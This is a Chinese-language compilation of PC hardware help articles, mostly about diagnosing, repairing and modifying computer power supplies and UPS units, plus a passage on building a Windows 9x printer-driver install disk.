注意：inf文件中所列的文件和软盘中的文件要一致。若一张软盘拷不下这么多文件，可以先拷核心文件和inf文件。当然在inf文件中也不要列出对应的文件。(剩余的文件待安装完毕再拷贝到目标计算机上，这些文件原先位于哪个目录，拷贝时也应复制到对应的目录下，一般位于“C：”下。)

第三步安装打印机驱动程序。在目标计算机上，点击“开始→设置→打印机”，双击“添加打印机”，按提示到选择打印机制造厂商与型号时，点击“从磁盘安装”，便会列出你在inf文件中所列出的打印机制造厂商与打印机型号，选中你所要安装的打印机，再按提示一步一步来，便可安装成功。

此方法只适于Windows 9x系列。不能把Windows 2000或基于Windows NT的打印机驱动程序搬至Windows 9x中。


打印机 扫描仪

《一键清理系统垃圾》

返回总目录

打印机 扫描仪

◎EPSON1500K打印机常见故障的维修
◎EPSON 750打印机喷头的清洗
◎EPSON LQ—670K票据打印机故障排除三例
◎EPSON 喷墨打印机计数器故障
◎HP 6L激光打印机常见故障的分析与维修
◎HP LaserJet 5000 激光打印机换粉详解
◎HP喷墨打印机“卡纸”的处理
◎LQ-1600K Ⅲ打印机两个故障的解决
◎LQ-1600K打印机断针的维修及保养
◎LQ-1600K系列打印机维修技巧
◎USB扫描仪特殊故障的排除
◎WINDOWS GDI打印机的奇怪故障
◎不花钱的扫描仪电源
◎打印机
◎打印机的几种常见故障和处理方法
◎打印机电源变压器的修理
◎打印机检测器主要故障分析与修复
◎打印机喷嘴清洗必杀武器
◎打印机十大共性故障解决方法
◎打印机十大共性故障解决方法（二）
◎打印机十大共性故障解决方法（一）
◎打印机十大共性故障解决方法
◎打印机竖线打印不直的解决方法
◎打印机无法打印的故障处理
◎非常棘手的一个打印机共享问题
◎复印机故障多例
◎激光打印机打印纸上重复出现脏迹的处理
◎激光打印机的常见故障
◎家用喷墨打印机维护及保养
◎解决USB打印机端口设置故障
◎快速更换针式打印机的断针和线圈
◎联想LJ6P激光打印机复活记
◎喷墨打印机的维护技巧
◎喷墨打印机日常的基本维护
◎普通针式打印机常见的故障
◎浅议激光打印机的卡纸问题
◎轻松化解扫描仪故障
◎扫描仪
◎扫描仪常见故障及其解决方案
◎扫描仪的“另类”用法
◎扫描仪故障分析
◎扫描仪故障分析与排除
◎在因特网中实现网络打印机的安全共享
◎针式打印机急救“123”
◎针式打印机缺纸处理
◎针式打印机维护经验14大法
◎针式打印机预防断针
◎针式打印机怎样防止断针
◎针式打印头的简易清洗法
◎自制打印机驱动程序安装盘

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


AT电源在ATX环境下的使用

《一键清理系统垃圾》

返回总目录 目录页 下一页

AT电源在ATX环境下的使用

    随着时代的进步、科技的飞速发展，电脑的更新换代速度也越来越快。与此同时大量的旧配件也越来越多的困扰着我们这些电脑爱好者。“怎样才能使这些曾经为我们立下汗马功劳的老功臣们最大限度发挥他们的余热呢？”我想这是困扰着我们每一个电脑爱好者的问题。下面我们首先来谈一谈关于AT电源在ATX环境下使用的问题：
        我想只要是一个比较资深的电脑爱好者都会有老式的AT机箱与电源，它随着电脑的升级换代，已经被我们打入冷宫多年。但随着我们电脑内部设备的不断升级换代，其功耗也越来越大，单单一个CPU的功耗就已在几十瓦，在加上一些大功率的降温设备的广泛使用（如：半导体冷凝片），仅它的功率就在70W以上，加上现在的高速硬盘、光驱等高速设备的广泛使用，使本来就不富裕的电源不堪重负。特别是现在一些劣质电源大量充斥市场，一些标称250W的电源实际功率连200W也不到，加上我们以前在购买电脑时很少会注意到电源方面的问题。所以，我们的电源就越来越显得力不从心了！也许你现在正在考虑购买新的电源，那么先劳您大架找一找以前的AT电源，让我来教你怎样让它起死回生、发挥余热。
        首先，我们需要准备十字头螺丝刀一把，电源到显示器电源线一根，机箱内电源延长线、导线若干（电烙铁、万用表等可选）。总的成本不会超过15元。同时，我准备了两套不同方案，但它们都可以达到预期的效果，只是“方案一”操作较为简单（适合于一般用户使用），“方案二”操作较为复杂（适合于有一定电器知识的专业用户），但更为稳定，另外还可以节省5块钱左右。以上两种方案共不同条件的朋友选择。
        方案一：普及型
        首先，将AT电源放在机箱上方，用电源线将ATX电源输出接口连接到AT电源输入接口，再将AT电源输出接口与显示器输入口相连，打开AT电源的开关，检查各接口处连接是否松动，打开ATX电源开关加电，这时你要注意显示器是否加电、AT电源与其风扇是否工作正常。如有条件用万能表测试AT电源各个输出电压是否正常。如一切正常，可进行下一步。如有一项不正常就需找出故障原因，排除故障后才能进行下一步。将AT电源输出给机箱内的D型头与买来得机箱内电源延长线的D型头相连，将延长线从中间拦腰截断，用导线分别加长延长线的各个连线（长度根据自身需要而定，接头处最好用锡焊焊接。），千万注意加长后的延长线原来两端的电线颜色一定要互相对应，也就是红对红、黑对黑、黄对黄，这一点非常重要，切记！！！将各个接头用黑胶布包好，打开一个较靠上的PCI槽门，将延长后的的D型头从打开的PCI槽门穿过进入机箱，分别将其于硬盘、光驱、半导体冷凝片等设备相连。最后，检查各个接头、接口连接是否正常。好现在，我们可以打开电源开关，来看看我们的辉煌成果了（注意：AT电源要一直打开，不能关闭）。
        方案二：专业型
        其主要过程与方案一相同，主要在于在AT电源测试完成后，将AT电源盖打开，用电烙铁将AT电源的开关引线各个接头焊点脱焊，用导线直接连接各个接点，再将连接D型头的引线分别从引出点脱焊，用导线分别焊在D型头各导线引出点，特别注意各个引出点的原来导线的颜色要与连接后得导线与D型头引线的颜色一致。接头处用锡焊焊牢，用黑胶布包好。将D型头传入机箱，与各设备连接后，检查各个接头是否正常。打开电源。效果怎么样！
        以上两种方案，不仅可以满足我们现在的日常需要，而且可以满足我们以后很长一段时间的长远需要，想想看将近450W的输出功率，实际功率也应在400W左右还想什么呢？（现在市场销售的电源最多也不过300W而已。想象看，真是酷毕了吧！）而且，这两种方案不仅可以解决原有电源的功率不足的问题，还解决了AT电源与ATX电源之间不能同步的问题，综合来讲，操作比较简单，一般人都能胜任。如有疑问欢迎来信与我交流。


变废为宝——摩好你的劣质电源

《一键清理系统垃圾》

变废为宝——摩好你的劣质电源

《中国电脑教育报》易志方

    我的爱机一向使用正常，但最近不知为何频繁死机，直至最后不能启动。我马上想到可能是电源引起的故障（用的是一个杂牌电源）。

    作为一个DIY爱好者，笔者决定在修理的基础上，进一步摩一摩（mondify）它。拆开外壳发现电源内部灰尘弥漫，只有先做清洁工作了。而后仔细的观察每一个电子元件，其中保险管和一个16伏特的电解滤波电容很显眼，其保险管“一刀两断”，滤波电容身体则明显发福。很显然这是由于电解电容漏液造成短路，进而引起保险丝熔断。先从电子市场买了两个250伏特 5安培的保险管（其中一个备用）和几个25伏特3300微法的大容量电解电容。更换好保险管并拆下损坏的电容（先不要把新的焊上去）后接通电源，在20针的电源接头上找到一根绿色PS_ON信号线，将之对地短接数秒（短接时间不宜过长或匹配一个500欧的阻抗）。此时电源散热风扇兴奋地转动起来了，这样进一步证明了我的诊断是完全正确的。

    接下来的工作便是“摩”电源了。为了提高耐压性和稳定性，决定用25伏特3300微法的大容量电容取代先前16伏特1000微法低耐压、低容量的劣质电容。此电源偷工减料，在12伏特的输出上正好还有一个电容的空闲位置，于是决定再加一个25伏特3300微法的电容。考虑到电源启动时经受不起电容充电带来较大电流的冲击，所以有必要在滤波电容之间串联一个扼流电感（见图1）。这既可以保证启动时的可靠性又可以保证电压的稳定性，成本也不过几元钱，何乐而不为呢。最后，一切准备就绪，开机展现在眼前的是一片带有成就感和兴奋之情的蓝天白云。


电源插座惹的祸

《一键清理系统垃圾》

电源插座惹的祸

《中国电脑教育报》熊义珍

    笔者爱机这段时间遇到的怪事颇多。例如：进入操作系统后，莫名其妙的“黑屏”；通过电视卡观赏的电视画面质量很差，干扰现象严重；在用电高峰时段使用爱机，明显感觉有些“迟钝”；显示器刚开机时的行幅变大等等。

    这些莫名其妙的故障困扰着笔者已经好几个月了。其间，笔者曾重新安装过操作系统、除尘并替换过各种配件，检查过资源状况，均无任何问题。

    直到有一天，笔者无意中听到了电源插座中有非常轻微的打火声，于是将电源盒拆开，认真检查各触点和电线的情况，结果无任何发现。那么，究竟是哪里发出的打火声呢？经过分析，笔者将疑点放在了起“短路保护作用”的保险管上，打开保险仓，取出保险管。发现其内部的铜丝已经变黑，但并没有融断。

    更换一个保险管后，各种莫名其妙的故障不再出现。这个时候，笔者真是百感交集，作为一个老资格的DIYer，竟然被一个保险管折磨了这么久。

    原因分析：由于保险管的质量较差，在长时间使用后产生了“质”变。这样，保险管就间接充当了一个电阻值较大的电阻，且这个电阻值很不稳定，因此电源插座所提供的电压就会不稳定，从而产生出强大的干扰信号影响电视卡工作，使其画面受到干扰。

    此外，不稳定的电压还同步影响着机箱电源，从而导致各种莫名其妙的情况发生。对于显示器来说，不稳定的电压影响着其内部的I2C控制电路的初始化，所以才会出现显示器行幅变大的情况。

    最后提醒大家一句，当计算机出现问题时，不要一味地在计算机自身上找原因，外部因素同样不容忽视。


电源故障一例

《一键清理系统垃圾》

电源故障一例

    一日，正喜滋滋地打开我刚刚升级的计算机时，刺耳的警报声突然不绝于耳，正纳闷时机器却又已经通过自检，一切恢复正常。

    难道是温度过高或CPU风扇停转？带着疑问我进入主板BIOS设置。由于本人的主板是带有硬件监测功能的技嘉GA-6BXE，所以在BIOS里可以看到CPU温度和CPU风扇转速，但我发现这两项都正常。我以为这只是一段小插曲，没有在意。可随着时间的推移，报警频率越来越高，到最后每天头一次开机都会有报警，而如果不管报警声强行进入系统，系统便会提示找不到鼠标。

    耳际受不了每次开机后那恼人的警报声干扰和漫长的等待，忍无可忍的情况下我决心一查到底。再次进入主板BIOS做地毯式的搜索，终于发现电源STAND BY一项输出电压不稳定，刚开机时电压只有1V，几分钟后才升到5V左右，每每正是此时警报就消失了，进入系统又一切正常。原因查明，赶快借来一个电源换上，一切果然恢复正常。

    由于电源已过保修期，只好自己想办法了。把电源拆开一看，发现电路板上有一个电容顶部拱起，而且有电解液漏出，已经被击穿，将其焊下后用相同型号电容更换，故障迎刃而解，此后那恼人的报警声再也没有出现了。

    仔细想来该故障之所以能顺利地发现、排除，主板的硬件监测功能立了大功。如果主板没有该功能，则故障现象恐怕将是开机自检一切正常，没有警报声，但进入系统之后就会提示找不到鼠标，这样就会使人怀疑是系统有软硬件冲突，甚至以为鼠标或主板PS/2接口损坏，那么折腾下去说不定会把问题搞得越来越糟。


电源问题引起的计算机运行速度变慢

《一键清理系统垃圾》

电源问题引起的计算机运行速度变慢

    计算机的价格总是降，一般家庭都能接受了。我的朋友前一段时间让我帮忙参谋着买了一台。配置是赛扬1.7GHz CPU、精英L4IBMGL主板（集成GeForce2 MX200显卡，AC'97）、DDR333 256MB现代内存、80GB迈拓7200rpm高速硬盘和普通300W电源机箱。

    开始计算机运行正常，速度也快，我还沾沾自喜地炫耀说：“看到了吧，钱少速度快呀……”。可是好景不长，朋友打电话来说计算机出奇的慢。我过去一看才知道，运行一般程序没事，就是运行Photoshop、3D、大型游戏时，计算机就好像死机一样，执行一项命令要2～3分钟，可是运行别的程序什么事都没有。我想病毒基本可以排除，不过我还是杀了一下，没有病毒。硬件损坏，也不可能，才不到1个月。硬件兼容也应该没事，因为我给其他朋友装了一台配置和这个一样（觉的好用才买的呀）。

    没什么好办法我就来回的试，只要一运行大型的程序就变慢，我突然听到有什么声音，再运行，怎么觉得只要一运行大程序风扇的声音就变小了。我马上打开机箱，运行Photoshop，CPU风扇的速度就渐渐地变慢了，几乎要停下来，怎么回事呀？关闭计算机，用万能表测了一下电压，很正常。打开计算机，又测了一下计算机的输出电压（测5V的）也很正常，我让计算机运行Photoshop再测电压还有4.7V，我明白了，原来是电源的问题！当CPU风扇转速变慢时，CPU本身的温度就会升高，为了保护CPU的安全，CPU就会自动降低运行频率，从而导致计算机运行速度变慢。

    找到了问题的原因，解决起来就很简单了。找来一个额定250W的长城电源换上，开机，问题解决。


电源质量莫小瞧

《一键清理系统垃圾》

电源质量莫小瞧

    朋友前段时间买得一块杂牌TNT2 Pro显卡，以替换那块早以“垂垂老矣”的i740。原以为可以好好感受一下令人震撼的视觉效果，可我近日接到他的电话，称显卡装上后，却频频出现运行死机的现象，有时甚至在启动时就黑屏。
        来到朋友家中，运行3ds MAX、CAD R14等“硬件杀手”程序，未过20分钟就死机。为防止是偶然情况，笔者又重新开机，运行了游戏《极品飞车3》，开始两圈跑下来还好，可到了最后还是非法当机！
        笔者拿出最新升级的KV3000进行查毒，没有发现病毒的踪影。于是又想到可能是系统不稳定造成的，重装Windows98后运行不一会儿故障再次出现！排除了以上两种原因，笔者又仔细对系统中的每一项设置进行了检查，为保险起见又检查了CMOS中的各项设置，可是都没有出现异常情况。
        无奈之下，笔者征得朋友同意，将那快TNT2拆下拿回家里仔细“研究”。打开机箱，用它换下自己的TNT显卡。进入Windows98，当笔者还在担心会不会突然死机时，不知不觉已过了两个小时，所有程序均运行良好。笔者心中便有了几分底。第二天马上将自己的长城电源拆下，来到朋友家换下他的，果然开机后再未“重蹈覆辙”！看来“罪魁祸首”就是朋友当初为省钱而买下的廉价电源呀！
        分析整个故障的原因，由于电源质量不佳，对于AGP插槽的供电也会存在不足的问题，而对TNT2显卡这样的“耗电大户”问题就更明显了，插槽供电不足就意味着死机恶梦的开始！所以提醒想要配电脑的朋友，选购电源千万不要过于省钱。买到一款功率大 、做工精良的好电源才能让您的整机更加让人放心！


改造不当，当烧电源

《一键清理系统垃圾》

改造不当，当烧电源

    最近，我给爱机升了级，升级后的配置为技嘉i845G（集成显卡、声卡）主板、P4 1.8GHz CPU、金钻80GB+昆腾火球20GB硬盘和BenQ 52x光驱。由于囊中羞涩，没有升级电源，只从朋友那里借了一个P4电源。看了《中国电脑教育报》2002年第48期A9版的《巧改动，普通电源也能支持P4》一文，我马上按文中的办法，给四针插座插了一条+12V电线和一条地线，改造后，能正常使用，并把借来的P4电源还给了朋友。

    两天后，开机遭遇黑屏，于是打开机箱，不禁吃了一惊——连接四针插座的+12V电线烧得黑黑的。检查电源，改造无误，其他地方也未受损伤，于是没放在眼里，换一根+12V电线插入。再过几天，故障再次出现。我不得不怀疑是改造造成的故障，用此方法改造的电源和P4电源最大的不同就是，P4电源是两个+12V并联在一起供电的，而我仅仅插了一个+12V。莫非这就是原因所在？忽然想起焦耳定律Q=I2Rt，由于只插了一个+12V，那么它就必须承担两条P4电源的+12V的电流，即2I，电阻增大一倍，即2R，由此可得Q=[(2I)2]2Rt=8IRt，也就是说这条+12V电线发热量达到P4电源+12V的8倍，不烧电线才怪呢！得什么病，吃什么药，我马上把两条电线烧毁的部分剪掉，用这两根+12V和两根地线给CPU供电，使用至今，一切正常。

    叮当补充一句，电源质量不佳也是改造出现问题的重要原因，所以我们不推荐那些使用杂牌电源的用户采用此方法进行改造。


解决接通电源后自动开机问题

《一键清理系统垃圾》

解决接通电源后自动开机问题

ATX主板经常会遇到这样的问题，一般在主板的BIOS里将电源管理项“POWER ON AFTER PWFAIL”设为OFF即可。


开关电源维修一例

《一键清理系统垃圾》

开关电源维修一例

故障现象：手提电脑电源适配器没有电压输出，初步判断电源适配器电路有问题。
    维修过程：拆开外壳检查，发现保险丝烧黑了，说明电源电路存在短路现象。用万用表测量场效应开关管的漏极对地电阻，阻值接近于零，拆下场效应开关管Q2测量，发现其漏-源极已烧通短路。我们在检修开关电源电路时，当检查出开关管已损坏，不能认为更换开关管后故障就已排除，因为有可能是开关管驱动电路故障引起开关管损坏。如果由于驱动的原因引起故障，那么在更换开关管后通电试机时，有可能再次烧毁开关管，造成维修成本升高。因此，还要进一步检查驱动电路是否工作正常。该电路采用的是他激式驱动电路，使用了一块TDA4605-3集成电路来实现脉冲宽度调制控制功能。由于手上没有资料，因此根据印刷电路描出电路图，如^05030801a^。分析该电路图，判断IC1的电源输入脚是第6脚，通电后测量6脚电压约十几伏，说明高压整流滤波电路正常，由Q1和集成电路构成的启动电源电路正常。用示波器测量第5脚驱动脉冲输出脚，没有波形输出，断定集成电路已损坏。跑了几家电子元件店，才买到一块TDA4605，没买到2SK1081场效应管，只好购买了一只功率更大的2SK1082代替，再购买一只3.15A的延时保险丝。更换元件后通电试验，发现还是没有18V电压输出，也没有出现再烧毁元件的现象，说明短路故障已排除，但还是没有驱动脉冲加到场效应管的栅极。进一步分析电路，高压整流输出的300V直流通过R5、C5和R4、R6、RT1加到集成块的第2、3脚，估计分别是场效应管过热取样和市电欠压取样电压。用万用表测量3脚有取样电压，2脚没有取样电压，拆下R5测量阻值为无穷大，已断路。换上一只1W270K电阻后再通电试验，电源有输出电压，但一秒钟后降为零。检查电路没有发现其他故障，再通电试验仍然只有一秒钟的电压输出。电源电路有一秒钟的输出电压，说明功率变换电路已经开始工作了，但不能维持下去。从电路图可知道IC1在通电初期由高压整流得到的300V通过Q1供给启动电源，变换电路工作后应改由D4对T1绕组的感应脉冲整流得到直流供给工作电源，现在IC1不能持续输出驱动脉冲，可能是在启动初期IC1输出的脉冲宽度过窄，D4整流后的电压过低，不能维持控制电路和变换电路的工作。根据正常使用情况下应该只有一个故障点的规律，对原有故障再进行分析，判断最初的故障原因应是R5，在R5损坏的瞬间，使IC1产生异常的驱动脉冲，导致场效应管烧毁，因此原来的TDA4605-3应该是好的，后来购买的IC型号为TDA4605，少了后面的“-3”，参数可能有差异，导致整个电路不能维持工作。把原来的TDA4605-3换回去后，电源适配器工作正常。
    经验教训：在维修过程中，由于不够细心走了一些弯路。首先在检查出IC1没有输出脉冲时，没有对集成电路的外围电路进一步进行检查，马上断定是集成电路损坏；其次在购买元件时，没有考虑到元件型号后缀编号不同可能存在的差异，因此使维修成本上升、故障现象增加、维修过程延长。


劣质电源祸害无穷

《一键清理系统垃圾》

劣质电源祸害无穷

    大家在购买电脑的时候，过多关心的是CPU的速度有多快，内存的容量有多大和速度为多少，硬盘的容量和转速此类的问题，这也是最透明的，也是广大商家最乐意宣传和吹牛用的。但是大家都忽略了一个很重要的问题，PC机的电源，这是其他各部件能够正常稳定长时间工作的根本所在。如果没有一个好的电源，你的电脑就是再高级，速度再快，也免不了三天两头的给你闹矛盾。下面就是一起电脑故障的排除过程，你看了就知道劣质电源可真是祸害无穷。

    举例说明：一款DIY兼容机，配置如下，PIV1.6GCPU，西捷80GST7200硬盘，技嘉8IRX533主板，RMOS256MDDR333内存

    故障现象：机器能够正常启动，但是有时在启动时会找不到硬盘，甚至有的时候正在使用电脑时硬盘会突然丢失。因为这种故障不明显，客户也没有在意，但是到后来死机情况越来越频繁，最后到了电脑无法使用的地步，客户才把电脑带到了公司，要求修理。

    故障排除：

    1.因为刚开始谁也没有想到会是电源问题，就按先软后硬，最小系统的原则逐一排除。因为是无规律死机，首先怀疑是软件问题，重装系统，但是在运行检测中仍旧出现死机情况。

    2.在排除软件故障后，开始考虑是硬件问题。首先采用最小系统法，去除光驱，软驱，调制解调器，网卡等，只保留显卡，内存，CPU，主板等基本硬件进行运行测试，还是出现了死机情况。

    3.这时可基本考虑故障的部件有可能是CPU或主板，内存这几个部件。于是对CPU，主板，内存进行单独测试后，发现主板有问题，即使使用其他电源，CPU，内存，仍旧出现死机情况，同时还是无法发现硬盘。到此基本上可以判定该款主板的IDE接口有问题，无法识别硬盘。

    4.本以为到此故障结束，为用户更换同型号的新主板上，装机。但是在加电后，仍然找不到硬盘，这时才感觉到问题的严重性，这台机器并不是只有一个部件有问题。因为还是找不到硬盘，但是可以肯定新主板是没有问题的。于是启动电源后，用万用表测试开关电源的各路输出，发现+12V的电压只有9.98V,而+5V的电压也只有4.4V，+3.3V的电压只有2.68V，都远远低于规定的标准电压，难怪这样的电源总出现死机呢。

    5.更换新的电源，把系统安装完毕后，加电试机，安装操作系统，一切正常，故障完全排除。

    故障总结：

    其实这款故障的最根本原因是因为电源的故障才造成了主板损坏，频繁死机的情况。但是因为死机的表面现象掩盖了电源的实际故障，才导致在检修过程中花费了大量不应该花费的时间。还有一点要说明，这台机器的硬盘，在新主板和电源更换后没有半个月，硬盘出现大面积的坏道，最后也只有返厂维修。

    到这里，我们也应该明白，虽然电源的价值在整个电脑中不占多少份量，但是其重要性就不用多说了。在这例故障维修中，因为一款不合格的电源，造成了主板损坏，硬盘损坏，同时还浪费了几天的维修时间。

    看了上面的文章，我们大家也应该明白，在购买兼容机时，千万不要在电源上省钱，要不将来会得不偿失的。

作者：TANK


让AT电源也自动关机

《一键清理系统垃圾》

让AT电源也自动关机

    前日，一友人问我：别人的机器都是在出现“你可以安全地关闭计算机”这样的字样以后就自动关机了，而你给我装的那台电脑却还要我用手来关是何道理？我说那是因为你的电脑是去年装的而电源是AT结构的，所以不能自动关机。
        友人走后我想了一下，其实，这也不是不可能实现的，只要能找出系统在开机与关机之间的某一点电压差就能实现自动关机，于是找了一台使用AT电源机器打开后用万用表查找电压，我发现最好取的电压是在硬盘的主电机上，它在关机时电压是6V，在开机时的电压是8.5V，于是加了一个小小的电路就实现了软件关机（只要有一点电子知识就可成功）。
        电路如^03030502a^所示。
        在计算机中需要改动的地方很少只有电源开关，见图把计算机的电源开关上的线全部拔掉，再将电源的一组线直接短接在一起，另一组线接在电源开关的一组上即可（K1），然后把K3（继电器开关）并接在K1上即可。而K2是留作强行关机之用，当系统死机时按下电源开关3～5秒再松开电源开关时，电源就会强行关闭。最后把电源开关的自锁销拔掉，按下再松开手后可以自动复位即可（这也是成功实现自动关机的重要一点）。
        在改装中需要注意的几点问题：一、当按下开关再松开时不能开机或不能自动关机时可适当减小或增加稳压管D3的稳压值。而强行关机的时间常数是由R3和C2决定的，可根据情况自行修改。本电路在WIN98/WINME/WIN2000下测试通过。另外在高级电源管理中要把电源方案一项设置为始终打开。
        过了几天，我为朋友改装完成，他对我说使用效果还行，比ATX电源还要爽，ATX电源还要用手关显示器而我现在连显器也不用关了，在出现“你可以安全地关闭计算机”后连显示器它也给我关了。
        硬盘主电机很好找，一般在硬盘线路板的中间，只要找到四个头子的小插座就算是找到了。如果哪位大虾有更好的方法请一定告知，本小鸟感激不尽。


山特8222型UPS电源检修

《一键清理系统垃圾》

山特8222型UPS电源检修

    山特8222型UPS电源是以U1（82STK618-00305-00）微处理器控制芯片为核心而构成的一台低成本、后备式方波输出UPS电源。检修的难点：一是没有图纸，二是对控制板上的U1、U2、U3和U5各引脚功能不甚了解，笔者实测8222型UPS电路，发现其微处理器芯片U1和山特M500型UPS所用的微处理器芯片（PPC 618-00040-01）相似，或许二者可直接替换，微处理器（PPC 618-00400-01）各脚功能见表。
        笔者查阅有关资料，得知U2是功率驱动门组件，其内部电路见^02030801a^。U2的1、2、3、4、5、6、7脚是输入，对应的输出脚是16、15、14、13、12、11、10、9脚箝位端，8脚接地。
        U5是一只光电耦合器，其内部结构如^02030801b^所示。
        山特8222型UPS电源逆变器中的功率驱动MOS管用的是5N06HD，其参数可简述如下，V（BR）DSS=60V，ID（maX）=50A，rds=22mΩ，VGS=5V，管型为TO-220AB，管脚排序为G、D、S（注：漏极D与管壳相连）。可以替代这种MOS管的品种有：PRF50N06、IRFZ48、SMP50N06、MTP50N06、BUK556-60A、IRFZ44、IRLZ44、BUK456-60、SUP70NO6等。
        掌握了U1、U2、U5各引脚功能和内部结构图，检修8222型UPS电源就事半功倍了。
        维修实例
        例一
        故障现象：开机，烧保险。
        分析与维修：根据故障现象分析，市电输入电路存在元件短路。因没有图纸，边测绘、边检测输入电路各元件，经检查发现，整流二极管D32、D35（IN4007）短路，更换D32、D35开机，不再烧保险。
        例二
        故障现象：接上市电，无220V电压输出，加电一会，电阻R80、R81很烫，不接市电，开机，机内发出“哧、哧”响声后，后备工作指示灯和市电供电指示灯交替闪烁，无电压输出。
        分析和维修：根据现象分析，可能是公共电路有故障。用万用表检查控制板上的二极管、三极管、继电器等元件，发现D4、D5（IN4148）短路，更换D4、D5，故障依旧。不接市电，开机，输出220V，但瞬间发生保护，接市电，输出电压高达260V，工作一会R80、R81很烫，说明抗尖峰抑制电路启动，检查抗尖峰抑制电路各无件，未见异常，测U1的10脚，输出5V高电平。逆变电路的驱动信号也是由U1的11、12脚输出的，UPS电源逆变和市电供电都不正常的可能性很小，怀疑微处理器U1有故障，更换U1。开机，市电供电正常，不接市电开机，输出电压185V，经查阅有关资料，山特8200系列后备式UPS，当它处于逆变提供方波电源的工作状态时，它的逆变器电源所输出的电压有效值低于逆变器电源处于带负载时的电压值。将UPS电源的输出接微机，电压输出220V。
        例三
        故障现象：市电供电正常，不接市电时，开机，输出电压高达300多伏，拆下控制板检查继电器，三个继电器线包和常闭触点良好，装上，让其逆变供电，一启动即发生保护。关机，机内还发出“滴嗒、滴嗒”的响声，只有取下蓄电池的一个极，响声才消失。
        分析与维修：不接市电开机，测U1的1脚电压，高达7.8V，正常值为5V，检查5V供电电路，发现Q2（2N3904）性能不良，更换Q2，关机不再发出响声，但U1的1脚电压仍高达7.8V，自测并绘画出5V供电电路图，得知5V是通过U3TL431的阴极输出的，怀疑是U3性能不良，更换U3，故障排除。
        山特8200系列UPS电源有自诊断功能，一开机即执行自诊断，如诊断到某一电路存在故障，即进入停机状态。遇到这种现象，可重点检测U1的2、3、4、5、8、16脚电压，即可知道哪一部分电路出现故障。另外，山特8200系列UPS电源检测到电池电压过低时，不仅不能逆变供电，连市电旁路电源也无输出，UPS将处于完全停电状态。其三，后备式UPS电源不能带负载开机，原因是：刚开机时，逆变器刚被启动还没有机会获得空载稳定运行的条件时，就被置于带负载运行状态（注意：此时的负载电流是负载的正常额定工作电流和负载的开机浪涌电流之和），这样，势必会大大增高UPS的故障率。


深入辨识机箱电源的优劣(二)

《一键清理系统垃圾》

深入辨识机箱电源的优劣(二)

    高频滤波电路

    经EMI电路滤波后的交流电，经过限流电阻等电路后，会在这里进行第二次高频滤波，以进一步滤除高频杂波。没有这道滤波电路的电源，其输出的电流质量较差，对CPU、内存等配件会造成较大的影响。

图3用料齐整的高频滤波器电路

    图3是一个用料齐整的高频滤波器电路。其电感、电容元件非常完整。

    而对于一款劣质电源来说，电路板上标出的电感线圈位置，干脆用一根导线直接搭接而成，电容位置上则根本没有任何元件（如图4）。

图4 劣质电源往往会省略许多应有的元器件

    可见，少了EMI电路的一个电感线圈和高频陷波器电路的一个电感线圈，劣质电源的重量，自然轻了不少。

    整流、滤波电路

    开关电源的正常工作，离不开优质的整流工序和滤波工序。整流电路通常由四只二极管组成桥式整流（或二极管整流桥堆）。需要注意的是：功率大的电源，其二极管或桥堆的体积也相应较大，这是因为需要通过较大的电流的缘故。

图5 680μf的电解电容（左）和整流桥堆（右）

    作为滤波电路来说，除了几只高频滤波电容之外，最主要的就算那“高耸入云间”的大电解电容了。此处所采用的电解电容的容量通常为220μf~680μf（如图5），耐压200V。可以这样说，电解电容的容量越大，其纹波系数越小，提供给后面的电流更平滑。

作者：王军


深入辨识机箱电源的优劣(三)

《一键清理系统垃圾》

深入辨识机箱电源的优劣(三)

    排气风扇

    每个电源均有一个进气风扇（早期的AT电源采用的是排气方式），这个风扇的作用就是保证机箱和电源内的空气流通。

    核心器件

    核心器件包括开关功率管、开关变压器等。

    开关电源充分利用三极管的饱和/截止特性，将前面整流滤波之后的直流电转换成高频脉动直流电并将其送到高频开关变压器的初级，由开关变压器耦合降压之后，由变压器的次级输出高质量的直流电。但是由于电脑对直流电的要求很高，因而随后还有一些整流、滤波电路对其进行进一步的处理。为了应对负荷的不平衡性和外部电压的不平衡性，开关稳压电源还有其自行的控制电路，通过对各级负载的电压进行取样、比较，然后利用PWM控制集成电路来控制、调整开关管的通断频率，使电压能够稳定在一个较为固定的电压上，这样就实现了稳压。

    对于开关功率管来说，耐压是非常重要的，如果耐压值偏低，则很容易被击穿而损坏。而它的电流指标通常都在10A以上，这样才能保证三极管能够通过足够的电流，以产生足够的功率。通常情况下，个头越大的开关三极管，其功率值和耐压值均较高。

图6 优质电源中的散热片

    另外，对于一款优质的电源来说，其开关三极管的散热片面积非常大，散热片也非常厚实（如图6）；而劣质电源通常仅用一块极薄的散热片（如图7）来散热。

图7 劣质电源中的散热片

    开关变压器是传递功率的部分，变压器的直径、高度、磁芯的材料都会影响到功率的输出大小。一般情况下，功率足够的开关电源，其开关变压器的高度较劣质高源的开关变压器更高（铁氧体的效率、铁芯的截面积和磁隙的宽度决定了开关变压器在大功率时，是否容易产生磁饱和，从而使功率受限）。另外，品质好的开关变压器，其所用的漆包线，也更粗一些。

    在图6中，我们可以看到体积最大的那个变压器正是开关变压器，而旁边的两个变压器则分别是辅助电源变压器和驱动变压器。经过比较，优质电源的开关变压器确实要高出劣质电源很大一截。


深入辨识机箱电源的优劣(四)

《一键清理系统垃圾》

深入辨识机箱电源的优劣(四)

    低压整流滤波电路

    通过开关变压器降压之后的脉动电流，必须重新进行整流，从而达到平滑直流电的要求（这是由于电脑硬件对于直流电平滑程度的要求非常高）。

    整流电路：整流电路需由专用的肖特基二极管来担当。这是由于开关变压器降压之后的脉动直流电的频率非常高，因而必须使用具有快速恢复功能的肖特基整流二极管。

图8 劣质电源的整流二极管

    优质电源采用的肖特基二极管是由一个双向二极管标示的器件（D83-004）构成的。而劣质电源通常采用的是两只具备快速反应能力的二极管（FR304），这样做的后果是两只二极管的参数由于不一致，因此很容易造成元件烧毁或工作效率降低，图8所示即是一台劣质电源的整流二极管。另外，由于整流二极管在工作时产生的热量很大，因此优劣电源为此配备了面积较大的散热片。

    滤波电路：尽管经过了整流，但是电流成分中依然存在着各种杂波成分。这个时候就需要使用各型滤波电路来滤除电流中的杂质成分了。

图9 优质电源的线圈有两个

    充当高频杂波阻断任务的是扼流线圈。在优质电源中，这样的线圈有两个（一大一小）（如图9）。而劣质电源则“毫不留情”的省略了一个小的扼流线圈，并且对大的扼流线圈进行偷工减料（减少匝数，采用截面积更小的铁芯等）。

    另外，对于劣质电源来说，仅保留了数只电解电容。而对于担当着最后一道防线的高频滤波电容，则采取了能省则省的“减料大法”。


